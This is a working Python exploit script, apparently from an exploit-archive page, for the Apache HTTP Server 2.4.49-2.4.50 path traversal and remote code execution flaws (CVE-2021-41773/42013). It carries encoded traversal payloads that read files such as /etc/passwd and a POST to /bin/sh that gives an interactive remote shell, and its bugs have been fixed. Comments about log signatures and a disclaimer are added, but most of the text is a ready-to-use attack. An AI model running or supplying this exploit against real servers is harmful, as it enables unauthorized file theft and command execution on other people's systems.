Exploit source code: exploit_CVE-2021-41773.py


# !/usr/bin/python3
# Author: Ravin | Blacknote
# CVE-2021-41773 | CVE-2021-42013
# Apache HTTP Server 2.4.49-2.4.50 - Path Traversal & Remote Code Execution

# Usage: 
# python3 exploit.py 127.0.0.1 8080 rce 'id'
# python3 exploit.py 127.0.0.1 8080 file '/etc/passwd'

# Reference(s):
# https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

import argparse
import requests as req


# Request-path prefixes consumed by traversal() and rce() below. Each one
# starts under a common URL prefix (/cgi-bin/ or /icons/) and then climbs
# with percent-encoded dot segments (".%2e", "%2e%2e"). Those literal
# substrings are the part worth searching for in access logs and filtering
# at a reverse proxy or WAF.

# File read via the /cgi-bin/ prefix; traversal() appends the absolute path.
payload1 = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e"
# File read via the /icons/ prefix; tried by traversal() after payload1.
payload2 = "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e"
# Same /cgi-bin/ climb ending at /bin/sh; rce() POSTs its command text here.
payload3 = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"


# Module-level placeholder. main() assigns its own local ``url`` and passes
# it to the helpers as an argument, so this value is never read in this file.
url = ""

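def check(url):
    """Compare the target's ``Server`` banner with the two affected versions.

    Sends one GET to *url* and looks for ``Apache/2.4.49`` or
    ``Apache/2.4.50`` in the ``Server`` response header. On a match it
    prints a notice and returns. Otherwise it asks the operator whether to
    continue and exits the process when the answer is ``n``.

    The banner is only a hint: a server configured to hide its version
    (for example with ``ServerTokens Prod``) or sitting behind a proxy will
    not match even if it is an affected build, and a matching banner says
    nothing about whether the vulnerable configuration is present.

    Args:
        url: Base URL of the target, e.g. ``http://127.0.0.1:8080``.
    """
    res = req.get(url)
    # The header can be missing entirely; treat that as "no version seen"
    # instead of letting the membership test below fail on None.
    server = res.headers.get('Server') or ""

    # The original condition was `"Apache/2.4.49" or "Apache/2.4.50" in server`,
    # which parses as `"Apache/2.4.49" or (...)` and is therefore always true:
    # every host was reported as vulnerable and the else branch was dead code.
    if "Apache/2.4.49" in server or "Apache/2.4.50" in server:
        print("[i] Host appears to be vulnerable.")

    else:
        print("[i] Host might not be vulnerable.")
        force = input("[!] Do you still want to run the exploit? (y/n): ")
        if force.lower() == "n":
            exit(0)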

            

def rce(url, cmd):
    """POST *cmd* to the ``payload3`` path and then loop over further input.

    Every request is a POST to ``url + payload3`` whose body is the fixed
    prefix ``echo Content-Type: text/plain; echo; `` followed by the command
    text. In server logs this shows up as a POST under ``/cgi-bin/``
    containing ``%2e`` segments and ending in ``/bin/sh``.

    A non-200 answer to the first request prints "[!] Host seems to be
    patched." and exits. That verdict rests on the status code alone, so any
    other cause of a non-200 response is reported the same way.

    Args:
        url: Base URL of the target.
        cmd: Text sent in the body of the first request.
    """
    payload_url = f"{url}{payload3}"

    def _post(command):
        # A new Session per request, as in the original flow.
        body = f"echo Content-Type: text/plain; echo; {command}"
        session = req.Session()
        prepared = req.Request('POST', payload_url, data=body).prepare()
        # NOTE(review): presumably restores the path exactly as built, in
        # case prepare() rewrote the encoded segments. Confirm against the
        # installed requests/urllib3 version.
        prepared.url = payload_url
        return session.send(prepared)

    first = _post(cmd)
    if first.status_code != 200:
        print("[!] Host seems to be patched.")
        exit(0)

    print("[*] Working Payload: " + payload_url + "\n")
    print(f"$ {cmd}")
    print(first.content.decode('utf-8', errors='ignore'))

    # Prompt loop: the literal input "exit" ends the process.
    while True:
        cmd = input("$ ")
        if cmd == 'exit':
            exit(0)
        reply = _post(cmd)
        print(reply.content.decode('utf-8', errors='ignore'))

def traversal(url, file):
    """GET *file* through ``payload1``, then ``payload2``, and print the body.

    For each prefix the request URL is ``url + prefix + file``. The first
    prefix that returns 200 is kept: its response is printed and the
    function then prompts for further absolute paths until the operator
    types ``exit``. If ``payload1`` does not return 200, ``payload2`` is
    tried. If that also fails, "[!] Host seems to be patched." is printed
    and the process exits.

    In server logs these are GET requests under ``/cgi-bin/`` or
    ``/icons/`` containing ``%2e`` segments followed by an absolute path.

    Args:
        url: Base URL of the target.
        file: Absolute path appended to the prefix for the first request.
    """

    def _get(target):
        # A new Session per request, as in the original flow.
        session = req.Session()
        prepared = req.Request('GET', target).prepare()
        # NOTE(review): presumably restores the path exactly as built, in
        # case prepare() rewrote the encoded segments. Confirm against the
        # installed requests/urllib3 version.
        prepared.url = target
        return session.send(prepared)

    for prefix in (payload1, payload2):
        base = f"{url}{prefix}"
        resp = _get(f"{base}{file}")

        if resp.status_code != 200:
            # Only the last candidate failing is reported as "patched".
            if prefix == payload2:
                print("[!] Host seems to be patched.")
                exit(0)
            continue

        print("[*] Working payload: " + base + "/path/to/file\n")
        print(resp.content.decode('utf-8', errors='ignore') + "\n")

        # Prompt loop: the literal input "exit" ends the process.
        while True:
            file = input("File (Absolute Path)> ")
            if file == 'exit':
                exit(0)
            follow_up = _get(f"{base}{file}")
            print(follow_up.content.decode('utf-8', errors='ignore') + "\n")

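def main():
    """Parse the four positional arguments and dispatch to the chosen mode.

    Arguments, in order: ``rhost`` (host, with or without a scheme),
    ``rport``, ``opt`` (a string containing ``rce`` or ``file``) and ``cmd``
    (the command text for ``rce`` mode, or the absolute path for ``file``
    mode). check() runs before either mode; an unrecognised ``opt`` prints
    "[!] Invalid Option!" and exits.
    """
    parser = argparse.ArgumentParser(description="CVE-2021-41773 & CVE-2021-42013")
    parser.add_argument("rhost")
    parser.add_argument("rport")
    parser.add_argument("opt")
    parser.add_argument("cmd")

    args = parser.parse_args()

    # The original test, `"http://" or "https://" not in args.rhost`, parses
    # as `"http://" or (...)` and is always true, so a host that already
    # carried a scheme was prefixed with "http://" a second time. Test the
    # prefix explicitly instead.
    if args.rhost.lower().startswith(("http://", "https://")):
        url = f"{args.rhost}:{args.rport}"
    else:
        url = f"http://{args.rhost}:{args.rport}"

    check(url)

    mode = args.opt.lower()
    if "rce" in mode:
        rce(url, args.cmd)
    elif "file" in mode:
        traversal(url, args.cmd)
    else:
        print("[!] Invalid Option!")
        exit(0)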

# Run main() only when executed as a script, so importing the module has
# no side effects.
if __name__ == "__main__":
    main()

Exploit author: Ravin

Source: https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution


⚠️ Disclaimer: All content is for authorized security research and educational purposes only. Use of this material for illegal or unauthorized activities is strictly prohibited. By using this site, you accept full legal responsibility for your actions. Use at your own risk.
